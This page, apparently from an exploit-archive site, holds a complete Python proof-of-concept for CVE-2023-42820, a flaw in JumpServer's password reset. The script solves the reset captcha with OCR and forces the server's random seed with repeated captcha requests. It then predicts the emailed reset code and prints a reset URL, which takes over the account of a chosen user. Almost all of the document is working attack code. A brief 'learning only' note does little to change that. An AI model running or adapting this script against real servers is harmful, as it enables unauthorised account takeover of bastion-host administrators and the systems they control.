4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-42820.py PY
# -*- coding: utf-8 -*-
import io
import re
from distutils.version import LooseVersion
import colorlog
import httpx
import logging
import sys
import random
import string
import argparse
from urllib.parse import urljoin, urlparse, parse_qs
import ddddocr
from PIL import Image
from bs4 import BeautifulSoup

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36',
}
# 定义特殊符号
string_punctuation = '!#$%&()*+,-.:;<=>?@[]^_~'
# 代理设置
PROXIES = {}


def banner():
    print('''

 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗ ██████╗  ██████╗ 
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗╚════██╗██╔═████╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝ █████╔╝██║██╔██║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗██╔═══╝ ████╔╝██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝███████╗╚██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝ ╚══════╝ ╚═════╝ 
                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: 代码仅供学习使用,请勿用于其他用途                              

    ''')


def setup_color_logging():
    # 创建一个 colorlog 的日志记录器
    logger = colorlog.getLogger()
    logger.setLevel(logging.INFO)

    # 创建控制台处理器并设置格式
    console_handler = logging.StreamHandler(sys.stdout)
    console_formatter = colorlog.ColoredFormatter(
        '%(asctime)s - %(log_color)s%(levelname)s - %(message)s',
        datefmt='%Y-%m-%d %H:%M:%S',
        reset=True,
        log_colors={
            'DEBUG': 'cyan',
            'INFO': 'green',
            'WARNING': 'yellow',
            'ERROR': 'red',
            'CRITICAL': 'bold_red',
        }
    )
    console_handler.setFormatter(console_formatter)

    # 将处理器添加到日志记录器
    logger.addHandler(console_handler)

    return logger


# 日志记录器对象
logger = setup_color_logging()


# 根据 JumpServer 的代码实现的重置验证码解密
def random_string(length: int, lower=True, upper=True, digit=True, special_char=False):
    args_names = ['lower', 'upper', 'digit', 'special_char']
    args_values = [lower, upper, digit, special_char]
    args_string = [string.ascii_lowercase, string.ascii_uppercase, string.digits, string_punctuation]
    args_string_map = dict(zip(args_names, args_string))
    kwargs = dict(zip(args_names, args_values))
    kwargs_keys = list(kwargs.keys())
    kwargs_values = list(kwargs.values())
    args_true_count = len([i for i in kwargs_values if i])
    assert any(kwargs_values), f'Parameters {kwargs_keys} must have at least one `True`'
    assert length >= args_true_count, f'Expected length >= {args_true_count}, bug got {length}'

    can_startswith_special_char = args_true_count == 1 and special_char

    chars = ''.join([args_string_map[k] for k, v in kwargs.items() if v])

    while True:
        password = list(random.choice(chars) for i in range(length))
        for k, v in kwargs.items():
            if v and not (set(password) & set(args_string_map[k])):
                # 没有包含指定的字符, retry
                break
        else:
            if not can_startswith_special_char and password[0] in args_string_map['special_char']:
                # 首位不能为特殊字符, retry
                continue
            else:
                # 满足要求终止 while 循环
                break

    password = ''.join(password)
    return password


def nop_random(seed: str):
    random.seed(seed)
    for i in range(4):
        random.randrange(-35, 35)

    for p in range(int(180 * 38 * 0.1)):
        random.randint(0, 180)
        random.randint(0, 38)


# 循环访问 seed 污染 worker 来达到固定 seed
def fix_seed(target: str, seed: str):
    def _request(i: int, u: str):
        logging.info('Send %d Request to %s', i, u)
        response = httpx.get(url=u, headers=headers, timeout=5, verify=False, proxies=PROXIES)
        assert response.status_code == httpx.codes.OK
        assert response.headers['Content-Type'] == 'image/png'

    url = urljoin(target, '/core/auth/captcha/image/' + seed + '/')
    for idx in range(10):
        _request(idx, url)


def get_seed(target: str):
    url = urljoin(target, "/core/auth/password/forget/previewing/")
    # url = urljoin(target, "/core/auth/password/forgot/")
    response = httpx.get(url=url, headers=headers, follow_redirects=False, verify=False, proxies=PROXIES)
    if response.status_code == httpx.codes.OK:
        # 匹配 seed
        html_text = response.text
        soup = BeautifulSoup(html_text, "lxml")
        captcha_src = soup.select_one('.captcha').get('src')
        seed = captcha_src.split('/')[-2]
        logging.critical("Get Seed: %r", seed)
        return seed
    else:
        return False


def ocr_captcha(target: str, max_attempts=5):
    attempts = 0
    while attempts < max_attempts:
        try:
            # 获取验证码图片
            seed = get_seed(target)
            if seed is None:
                logging.error("Failed to Get Captcha Seed")
                return None
            image_url = urljoin(target, 'core/auth/captcha/image/' + seed + '/')
            response = httpx.get(url=image_url, headers=headers, verify=False, proxies=PROXIES)
            response.raise_for_status()
            img_bytes = io.BytesIO(response.content)

            # 图片识别
            res_code = recognize_captcha(img_bytes)

            # 计算验证码结果
            result = calculate_captcha_result(res_code)
            if result is not None:
                logging.critical("Captcha Result: %r", result)
                return str(result), seed

        except (httpx.HTTPError, httpx.RequestError) as e:
            logging.error("Failed to Fetch Captcha Image: %s", str(e))
            attempts += 1
    return None


def recognize_captcha(img_bytes):
    ocr = ddddocr.DdddOcr()
    img = Image.open(img_bytes).convert('L')
    img = img.resize((int(img.size[0] * (64 / img.size[1])), 64), Image.ANTIALIAS)
    img_bytes = io.BytesIO()
    img.save(img_bytes, format='PNG')
    img_bytes = img_bytes.getvalue()
    res_code = ocr.classification(img_bytes)
    logging.warning("Captcha Image Result: %s", res_code)
    return res_code


def calculate_captcha_result(res_code):
    if len(res_code) < 3 or res_code[1] not in ['+', '-', '*', '/', 'x'] or '10' in res_code or 'o' in res_code:
        logging.warning("Failed to Convert Operands to Integers")
        return None

    operator = re.findall(r"[+\-*/x]", res_code)[0]
    operands = re.findall(r"\d+", res_code)
    if len(operands) != 2:
        logging.warning("Failed to Convert Operands to Integers")
        return None

    try:
        a, b = map(int, operands)
        if operator == ["+", "x"]:
            result = a + b
        elif operator == "-":
            result = a - b
        elif operator in "*":
            result = a * b
        elif operator == "/":
            result = a / b
        else:
            logging.error("Invalid Operator: %s", operator)
            return None

        return result
    except (ValueError, ZeroDivisionError) as e:
        logging.warning("Failed to Calculate Captcha Result: %s", str(e))
        return None


def get_token(target: str, username: str):
    url = urljoin(target, "/core/auth/password/forget/previewing/")
    # 获取 csrf_token
    with httpx.Client(headers=headers, follow_redirects=True, verify=False, proxies=PROXIES) as client:
        token_resp = client.get(url=url)
        assert token_resp.status_code == httpx.codes.OK
        # 匹配参数
        html_text = token_resp.text
        soup = BeautifulSoup(html_text, "lxml")
        # 匹配 csrf_token
        csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'}).get('value')
        logging.critical("Get Csrf_Token: %s", csrf_token)
        # 匹配 token_seed, 计算验证码结果
        token_captcha, token_seed = ocr_captcha(target)
        # 发起表单 POST 请求
        csrf_cookies = token_resp.cookies
        data = {
            'csrfmiddlewaretoken': csrf_token,
            'username': username,
            'captcha_0': token_seed,
            'captcha_1': token_captcha,
        }
        response = client.post(url=url, data=data, cookies=csrf_cookies)
        assert response.status_code == httpx.codes.OK
        # 匹配 token
        parsed_url = urlparse(str(response.url))
        query_dict = parse_qs(parsed_url.query)
        reset_token = query_dict.get('token', [''])[0]
        logging.critical("Get Token: %s", reset_token)
    return str(reset_token)


def send_code(target: str, email: str, reset_token: str):
    url = urljoin(target, "/api/v1/authentication/password/reset-code/?token=" + reset_token)
    response = httpx.post(url=url, json={
        'email': email,
        'sms': '',
        'form_type': 'email',
    }, headers=headers, follow_redirects=False, verify=False, proxies=PROXIES)
    if response.status_code == httpx.codes.OK:
        logging.info("Send Code Headers: %r Response: %r", response.headers, response.text)
        return True
    else:
        return False


def check_version(target: str):
    if get_seed(target):
        # 发送 GET 请求获取页面内容
        with httpx.Client(headers=headers, verify=False, follow_redirects=True, proxies=PROXIES) as client:
            response = client.get(url=target)
            page_content = response.text
            # 类似 src=/ui/assets/js/<jsFile></script></body></html>
            match = re.search(r'src=/ui/assets/js/(?P<jsFile>[a-zA-Z0-9.]+)></script></body></html>', page_content)
            if match:
                js_file = match.group('jsFile')
                logger.critical("Found JSFile: %s", js_file)
            else:
                logger.critical("Not Found")
                exit()
            js_url = f"{target}/ui/assets/js/{js_file}"
            js_response = client.get(url=js_url)
            js_content = js_response.text

            # 匹配版本号
            pattern1 = r'value:"v(\d+\.\d+\.\d+)"'
            pattern2 = r'version:"(\d+\.\d+\.\d+)"'

            match1 = re.search(pattern1, js_content)
            if match1:
                version = match1.group(1)
                logger.critical("Found Version: %s", version)
            else:
                match2 = re.search(pattern2, js_content)
                if match2:
                    version = match2.group(1)
                    logger.critical("Found Version: %s", version)
                else:
                    logger.critical("Not Found")
            # 判断漏洞版本
            if LooseVersion(version) <= LooseVersion('2.28.20') or LooseVersion(version) <= LooseVersion('3.7.1'):
                logger.critical("Vulnerable")
                return True
            else:
                return False


def main(target: str, email: str, username: str):
    if check_version(target):
        # 获取 seed
        seed = get_seed(target)
        # 获取token
        reset_token = get_token(target, username)
        # POST
        fix_seed(target, seed)
        nop_random(seed)
        if send_code(target, email, reset_token):
            code = random_string(6, lower=False, upper=False)
            logging.critical("Your Code is %s", code)
            reset_url = urljoin(target, '/core/auth/password/forgot/?token=' + reset_token)
            logger.critical('Reset Url: %s', reset_url)
        else:
            logging.critical("Send Code Fail")
    else:
        logger.critical("Not Vulnerable")


if __name__ == '__main__':
    banner()
    parser = argparse.ArgumentParser(description='CVE-2023-42820 by C1ph3rX13.')
    parser.add_argument('-t', '--target', type=str, required=True, help='target url')
    parser.add_argument('-e', '--email', type=str, required=True, help='account email')
    parser.add_argument('-u', '--username', type=str, required=True, help='account username')
    parser.add_argument("--proxy", type=str, required=False, help="proxy to http://ip:port")

    args = parser.parse_args()
    if args.proxy:
        PROXIES = {'all://': f'{args.proxy}'}
    main(args.target, args.email, args.username)